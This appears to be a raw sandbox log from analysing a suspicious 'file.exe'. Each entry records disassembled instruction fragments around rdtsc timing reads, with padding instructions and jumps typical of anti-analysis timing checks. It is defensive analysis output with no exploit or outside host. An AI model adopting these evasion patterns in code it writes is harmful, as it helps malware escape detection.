Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D54 second address: 983D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D58 second address: 983D6C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FFBC91A3BF1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D6C second address: 983D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D8E second address: 983D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D93 second address: 983D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D99 second address: 983D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9841C5 second address: 9841CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9841CB second address: 9841E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984639 second address: 984640 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984C08 second address: 984C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984C0C second address: 984C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFBC8B2DA9Ch 0x0000000c jl 00007FFBC8B2DA96h 0x00000012 jmp 00007FFBC8B2DAA9h 0x00000017 jmp 00007FFBC8B2DAA0h 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984C55 second address: 984C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDEh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989570 second address: 98957C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FFBC8B2DA96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98957C second address: 989586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFBC91A3BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B8B4 second address: 98B8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B8BA second address: 98B8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FFBC91A3BD8h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFBC91A3BDBh 0x00000017 je 00007FFBC91A3BD6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B8DD second address: 98B8E7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B8E7 second address: 98B8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 990868 second address: 99086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98FCFB second address: 98FCFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98FCFF second address: 98FD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9902B0 second address: 9902D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 push ebx 0x0000000a jnl 00007FFBC91A3BD6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 990437 second address: 990451 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FFBC8B2DA9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9959A7 second address: 9959AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9959AD second address: 9959C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 995C0B second address: 995C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 995C11 second address: 995C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 995C15 second address: 995C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947842 second address: 9478C5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov ebx, dword ptr [ebp+1248882Fh] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FFBC8B2DA98h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push eax 0x0000002d mov dh, 6Ch 0x0000002f pop ecx 0x00000030 add eax, ebx 0x00000032 stc 0x00000033 push eax 0x00000034 jmp 00007FFBC8B2DAA5h 0x00000039 mov dword ptr [esp], eax 0x0000003c mov cx, 1A12h 0x00000040 push 00000004h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FFBC8B2DA98h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000015h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 js 00007FFBC8B2DA96h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 996AF3 second address: 996AF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 996AF8 second address: 996B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FFBC8B2DA9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 996B05 second address: 996B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BE7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9994CA second address: 9994D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9997FE second address: 999809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A12EE second address: 9A12F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFBC8B2DA96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A12F8 second address: 9A132F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FFBC91A3BE2h 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FFBC91A3BD6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A132F second address: 9A1354 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFBC8B2DA96h 0x00000008 js 00007FFBC8B2DA96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jmp 00007FFBC8B2DAA0h 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A1354 second address: 9A135C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A135C second address: 9A1360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A1360 second address: 9A136A instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F322 second address: 99F35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC8B2DAA2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBC8B2DAA2h 0x00000013 jmp 00007FFBC8B2DA9Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F5C9 second address: 99F5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F5CE second address: 99F5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FFBC8B2DA96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F5D9 second address: 99F5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F5F8 second address: 99F5FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FB8F second address: 99FB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A041E second address: 9A0424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0A01 second address: 9A0A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FFBC91A3BDCh 0x0000000a jmp 00007FFBC91A3BDFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0C72 second address: 9A0C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5FFD second address: 9A6001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5300 second address: 9A5322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5322 second address: 9A5326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5326 second address: 9A5338 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A55C6 second address: 9A55D9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 jbe 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A55D9 second address: 9A5607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Fh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FFBC8B2DA9Eh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5607 second address: 9A560C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A560C second address: 9A5613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5613 second address: 9A562E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE3h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5A84 second address: 9A5A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FFBC8B2DA9Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5A9E second address: 9A5AD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007FFBC91A3BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FFBC91A3BDDh 0x00000013 pushad 0x00000014 jmp 00007FFBC91A3BE2h 0x00000019 jo 00007FFBC91A3BD6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5C36 second address: 9A5C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jnc 00007FFBC8B2DAB0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FFBC8B2DA9Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AA666 second address: 9AA68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jp 00007FFBC91A3BD6h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFBC91A3BE1h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AA68C second address: 9AA690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AA690 second address: 9AA69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FFBC91A3BD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B1F07 second address: 9B1F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA5h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC8B2DAA0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B209B second address: 9B20A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B20A1 second address: 9B20A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B264B second address: 9B2653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2653 second address: 9B2685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FFBC8B2DA96h 0x0000000a jmp 00007FFBC8B2DA9Ah 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007FFBC8B2DAA6h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2908 second address: 9B290C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B290C second address: 9B2916 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2916 second address: 9B2922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2922 second address: 9B2926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2926 second address: 9B2937 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FFBC91A3BDBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2937 second address: 9B293C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B293C second address: 9B2976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDCh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBC91A3BE8h 0x00000013 jmp 00007FFBC91A3BDDh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2D8F second address: 9B2DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2DA9 second address: 9B2DB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3423 second address: 9B3429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3429 second address: 9B3431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3431 second address: 9B3435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6075 second address: 9B6079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6079 second address: 9B6084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAA83 second address: 9BAA8D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAA8D second address: 9BAA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C5209 second address: 9C520D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C520D second address: 9C5225 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FFBC8B2DA96h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D03A6 second address: 9D03C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDAh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FFBC91A3BE2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D8BA0 second address: 9D8BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D8BA6 second address: 9D8BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFBC91A3BD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC91A3BDAh 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E027D second address: 9E0281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0281 second address: 9E02A1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FFBC91A3BDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E02A1 second address: 9E02A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E02A5 second address: 9E02A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E041F second address: 9E0423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
